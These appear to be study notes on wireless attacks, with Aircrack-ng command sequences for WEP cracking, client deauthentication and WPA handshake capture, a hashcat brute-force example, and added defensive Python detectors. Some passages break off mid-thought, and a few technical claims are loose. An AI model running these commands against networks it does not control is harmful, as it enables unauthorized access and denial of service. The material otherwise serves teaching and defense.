# Wireless threats and attacks

Version: 1.0.2
## Wireless threats

- **Access control attacks**: evading access control measures such as access point MAC filters and port-based access control.
- **Integrity attacks**: sending forged frames, e.g. data frame injection, bit-flipping.
- **Confidentiality attacks**: intercepting confidential information transmitted over the network, e.g. traffic analysis, session hijacking, MITM.
- **Availability attacks**: attempting to prevent users from accessing WLAN resources, e.g. flooding, ARP poisoning, de-authentication attacks.
- **Authentication attacks**
- **Misconfigured access point attack**: exploiting accidental configuration mistakes.
- **Ad hoc connection attack**: connecting directly to another device via an ad-hoc network. Not very successful, as the other user has to accept the connection.
- **Honeyspot access point attack**: using multiple WLANs in an area with the same SSID.
- **AP MAC spoofing**: MAC spoofing to masquerade as an authorized client.
- **Jamming signal attack**: jamming or blocking the wireless communication, causing a denial of service.

### De-authentication attack

- Also known as a deauthentication (deauth) attack.
- Used to capture the handshake traffic.
- Can also be used to DoS the client by continuously de-authenticating the device.

### Evil twin attack

- Also known as client mis-association.
- A rogue access point placed outside the premises, alongside the legitimate one.
  - E.g. can lure the employees of the organization into connecting to it.
- Can be done using Airsnarf.

### Honeyspot attack

- Faking a well-known hotspot on a rogue AP.
  - E.g. a McDonald's or Starbucks free Wi-Fi spot.

### Rogue access point attack

- Fake AP with the same SSID as the legitimate one.
- Allows hijacking connections and acting as a man in the middle, sniffing traffic.
- Differs from the evil twin attack in that it focuses on MITM instead of on Wi-Fi passwords.

### Sinkhole attack

- A compromised node tries to attract network traffic by advertising fake routing updates.
- Allows traffic to be directed away from its target.
- Can be used to launch other attacks, like dropping or altering routing information.
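From the defender's side, the de-authentication, evil twin, honeyspot and rogue AP entries above all leave a trace in 802.11 management frames that a passive monitor (such as Kismet, listed further down) can see. The following Python is an added example, not code from the original notes: it runs two simple checks over a constructed list of parsed frame records, flagging a burst of deauthentication frames from one BSSID (the DoS form of the deauth attack) and a beacon that announces one of our SSIDs from a BSSID that is not on our allow-list (the evil twin / rogue AP / honeyspot indicator). The frame record layout, the `KNOWN_APS` allow-list, the thresholds and all addresses are assumptions made for the example.

```python
"""Passive 802.11 management-frame monitor (added example, not from the original notes).

Two detections over a list of parsed management-frame records:
  * deauthentication flood: many deauth frames from one BSSID in a short window
  * SSID impersonation: a beacon for one of our SSIDs sent by a BSSID that is
    not on the allow-list (evil twin / rogue AP / honeyspot indicator)
The frame records are a constructed sample; a real deployment would fill them
from a monitor-mode capture (e.g. Kismet), which is out of scope here.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

# One record per frame: ts (seconds), subtype ("deauth"/"beacon"/...), bssid, ssid (beacons only)
Frame = Dict[str, object]

# Constructed sample: 30 deauth frames in 0.3 s carrying the legitimate AP's BSSID
# (what a spoofed deauth flood looks like), plus beacons from a look-alike AP.
SAMPLE_FRAMES: List[Frame] = (
    [{"ts": 100.0 + i * 0.01, "subtype": "deauth", "bssid": "00:11:22:33:44:55", "ssid": None}
     for i in range(30)]
    + [{"ts": 100.0, "subtype": "beacon", "bssid": "00:11:22:33:44:55", "ssid": "CorpWiFi"},
       {"ts": 100.1, "subtype": "beacon", "bssid": "66:77:88:99:AA:BB", "ssid": "CorpWiFi"},
       {"ts": 100.2, "subtype": "beacon", "bssid": "66:77:88:99:AA:BB", "ssid": "CorpWiFi"},
       {"ts": 100.3, "subtype": "beacon", "bssid": "DE:AD:BE:EF:00:01", "ssid": "GuestNet"},
       {"ts": 105.0, "subtype": "deauth", "bssid": "DE:AD:BE:EF:00:01", "ssid": None}]
)

# Constructed allow-list: the SSIDs we operate and the BSSIDs allowed to announce them.
KNOWN_APS: Dict[str, Set[str]] = {"CorpWiFi": {"00:11:22:33:44:55"}}


def detect_deauth_flood(frames: Iterable[Frame], window_s: float = 1.0,
                        threshold: int = 10) -> Dict[str, int]:
    """Return {bssid: peak deauth count} for every BSSID whose deauth count in
    some sliding window of window_s seconds reaches threshold.  A healthy AP
    sends deauths rarely; a sustained burst is the DoS form of the attack."""
    by_bssid: Dict[str, List[float]] = defaultdict(list)
    for f in frames:
        if f["subtype"] == "deauth":
            by_bssid[str(f["bssid"])].append(float(f["ts"]))
    alerts: Dict[str, int] = {}
    for bssid, times in by_bssid.items():
        times.sort()
        peak, start = 0, 0
        for end in range(len(times)):          # two-pointer sliding window
            while times[end] - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts


def detect_ssid_impersonation(frames: Iterable[Frame],
                              known_aps: Dict[str, Set[str]]) -> Set[Tuple[str, str]]:
    """Return {(ssid, bssid)} for beacons that advertise one of our SSIDs from a
    BSSID not on the allow-list.  SSIDs we do not own (a neighbour's network)
    are ignored, so this only fires on impersonation of our own networks."""
    suspects: Set[Tuple[str, str]] = set()
    for f in frames:
        if f["subtype"] != "beacon" or f["ssid"] not in known_aps:
            continue
        if f["bssid"] not in known_aps[str(f["ssid"])]:
            suspects.add((str(f["ssid"]), str(f["bssid"])))
    return suspects


if __name__ == "__main__":
    print("deauth floods:", detect_deauth_flood(SAMPLE_FRAMES))
    print("SSID impersonation:", detect_ssid_impersonation(SAMPLE_FRAMES, KNOWN_APS))
```

The deauth check keys on the BSSID in the frame rather than on who really sent it, because a spoofed flood carries the legitimate AP's address; the useful response is to correlate the alert with the AP's own logs (a real AP rarely deauthenticates dozens of times a second). Management frame protection (802.11w) is the standard mitigation for the flood itself.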
### DNS sinkhole

- Also known as a sinkhole server, Internet sinkhole, or blackhole DNS.
- A DNS server that gives out a false result for a domain name.
- Used to attack sensor/IoT device networks.
- Can be prevented by running your own DNS server or hardcoding IP addresses.
- E.g. WannaCry was stopped from spreading as a worm by Marcus Hutchins, who discovered the kill switch in the malware and registered its domain name as a DNS sinkhole.

## Wireless hacking methodology

1. **Wi-Fi discovery**
   - GPS mapping
   - List of discovered Wi-Fi networks
2. **Wireless traffic analysis**
   - Capture the packets to reveal any information (SSID, authentication method, ...)
3. **Launch attacks**
   - E.g. ARP poisoning, MAC spoofing, de-authentication, rogue access point, MITM.

### Wireless discovery

- Also known as Wi-Fi discovery.
- **Wardriving**: using a mobile vehicle to detect Wi-Fi networks.
  - E.g. the T.J. Maxx data theft, where 45 million credit/debit card records were stolen because of weak WEP encryption.
  - Variants: warbiking, warcycling, warwalking.
- **Warchalking**: drawing symbols in public places to advertise an open Wi-Fi network.
- Tools:
  - WiFiExplorer, WiFiFoFum, OpenSignalMaps, WiFinder
  - **WIGLE**: map of wireless networks
  - **NetStumbler**: Windows tool to find networks
  - **Kismet**: wireless network detector, sniffer, and intrusion detection system. Works without sending any packets (passively).
  - **NetSurveyor**: Windows tool similar to NetStumbler and Kismet
  - **Silica**: discovers and shows vulnerabilities

## Wireless encryption attacks

### WEP cracking

- Weak IVs (initialization vectors):
  - Small
  - Get reused frequently
  - Are sent in clear text during transmission
- Can take a few seconds to discover the shared secret key.
- The goal is to collect as many IVs as possible.
  - Inject packets to speed it up.
- Can be cracked using Aircrack-ng:
  1. Listen to the traffic: start a compatible adapter with injection and sniffing capabilities.

     ```sh
     airmon-ng start <interface-name>
     ```

  2. Start a sniffer to capture packets.

     ```sh
     airodump-ng --bssid <AP-MAC-address> -c 11 -w <output-file> <interface-name>
     ```

  3. Create more packets to speed up collecting IVs, e.g. by injecting ARP traffic.

     ```sh
     aireplay-ng -3 -b 00:09:58:6F:64:1E -h 44:60:57:c8:58:A0 mon0
     ```

  4. Run a cracking tool to extract the encryption key from the collected IVs.

     ```sh
     aircrack-ng <output-file>.cap
     ```

  - The default method is PTW (Pyshkin, Tews, Weinmann); other (older) supported methods include:
    - FMS (Fluhrer, Mantin, Shamir) attacks: statistical techniques
    - KoreK attacks: statistical techniques
    - Brute force
- Using separate tools for sniffing and cracking:
  - Gather packets through e.g. Wireshark or Prismdump.
  - Crack using e.g. WEPCrack, AirSnort, Aircrack-ng, or WEPLab.

### WPA/WPA2 cracking

- Much more difficult than WEP.
- Uses a constantly changing temporal key and a user-defined password.
- Key Reinstallation Attack (KRACK): a replay attack that uses the third handshake message of another device's session.
- Most other attacks are simply brute-forcing the password, which takes a lot of time.

#### Sniffing the 4-way handshake

- The 4-way handshake is the ceremony between the AP and the device.
- Vulnerability in WPA and WPA-Personal (WPA-PSK, pre-shared key).
- During the WPA handshake, the password is shared in encrypted form (called the PMK, pairwise master key).
- Flow:
  1. The client tries to connect to an AP (access point).
     - If the client is already connected, a deauthentication attack can be used to disconnect it and sniff while it reconnects.
  2. Grab packets while the client goes through the 4-step authentication process.
  3. Crack the WPA key from the recorded packets.
     - Can be an offline attack, e.g. utilizing a cloud virtual machine.
     - E.g. using hashcat.
- Steps:
  1. Recording and deauthenticating using the Aircrack-ng suite (often seen in movies, as it looks cool):

     ```sh
     airmon-ng start <interface-name>
     ```

     creates a new interface and enables monitor mode.

     ```sh
     airodump-ng <interface-name>
     ```

     lists access points with BSSID, encryption (WPA2 etc.) and more.

     ```sh
     airodump-ng -c 2 -w capture -d <BSSID> <interface-name>
     ```

     listens on channel 2, filtered to the given BSSID, and writes to `capture`; shows each client MAC, logs their traffic and notifies when a handshake is captured.

     ```sh
     aireplay-ng --deauth 100 -a <BSSID> -c <client-MAC> <interface-name>
     ```

     injects packets to de-authenticate the client.

  2. Crack the password using hashcat:
     1. Convert the capture files from airodump-ng from `.cap` to `.hccapx`, using e.g. an online tool.
     2. Run:

        ```sh
        hashcat.bin -a 3 -m 2500 converted-file.hccapx ?d?d?d?d?d
        ```

        - `-m 2500`: hash mode for WPA-EAPOL-PBKDF2
        - `-a 3 ?d?d?d?d?d`: attack mode 3 (brute force) with a mask of five digit positions (`?d`)

More secure against sniffing, brute force and WPS attacks. However, it has implementation bugs that can be exploited using:

### Aircrack-ng

- Sniffer, detector, traffic analysis tool and password cracker.
- Official webpage | Source code
- Uses dictionary attacks for WPA and WPA2; other attacks are for WEP only.

### Cain and Abel
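The hashcat step above works by re-deriving the PMK for every candidate passphrase in the mask, exactly as the client and AP derive it; the mask keyspace is therefore what decides whether an offline attack is feasible. The following Python is an added example, not code from the original notes or from hashcat: it derives a PMK with the standard WPA-Personal KDF (PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output, SSID as salt) and compares the candidate count of the five-digit mask with that of longer passphrases. The candidate rate and the helper names are assumptions for the example; the expected PMK is the published IEEE 802.11i test vector for passphrase `password` and SSID `IEEE`.

```python
"""WPA/WPA2-PSK strength check (added example, not part of the original notes).

hashcat mode 2500 re-derives the PMK from each candidate passphrase exactly as the
client and AP do: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
Only the KDF and the keyspace arithmetic are shown (no handshake verification);
the point is how small a mask keyspace is versus a long random passphrase.
"""
import hashlib
from math import prod

# Charset sizes of hashcat's built-in mask tokens.
MASK_CHARSET_SIZES = {"d": 10, "l": 26, "u": 26, "s": 33, "a": 95}


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK as defined by IEEE 802.11i for WPA-Personal: PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)


def mask_keyspace(mask: str) -> int:
    """Number of candidates a hashcat -a 3 mask enumerates, e.g. '?d?d?d?d?d' -> 100000."""
    if len(mask) % 2 or any(mask[i] != "?" for i in range(0, len(mask), 2)):
        raise ValueError("expected a mask made only of ?x tokens")
    return prod(MASK_CHARSET_SIZES[mask[i + 1]] for i in range(0, len(mask), 2))


def passphrase_keyspace(length: int, charset_size: int) -> int:
    """Candidates for a random passphrase of the given length over a charset of that size."""
    return charset_size ** length


def seconds_to_exhaust(keyspace: int, candidates_per_second: float) -> float:
    """Worst-case time to try every candidate at a given PMK-derivation rate."""
    return keyspace / candidates_per_second


if __name__ == "__main__":
    # Expected: f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e
    print("PMK('password', 'IEEE') =", derive_pmk("password", "IEEE").hex())
    rate = 500_000.0  # constructed assumption: PMK derivations per second, not a benchmark
    for label, ks in [("?d?d?d?d?d mask", mask_keyspace("?d?d?d?d?d")),
                      ("8 lowercase", passphrase_keyspace(8, 26)),
                      ("16 printable", passphrase_keyspace(16, 95))]:
        days = seconds_to_exhaust(ks, rate) / 86400
        print(f"{label:16} {ks:>32,d} candidates, {days:.3g} days to exhaust")
```

The 4096 PBKDF2 rounds are what make each guess expensive, but they cannot rescue a five-digit PSK (100,000 candidates); the defensive conclusion is a long random passphrase, or WPA2-Enterprise / WPA3, so that the captured handshake is not worth attacking offline.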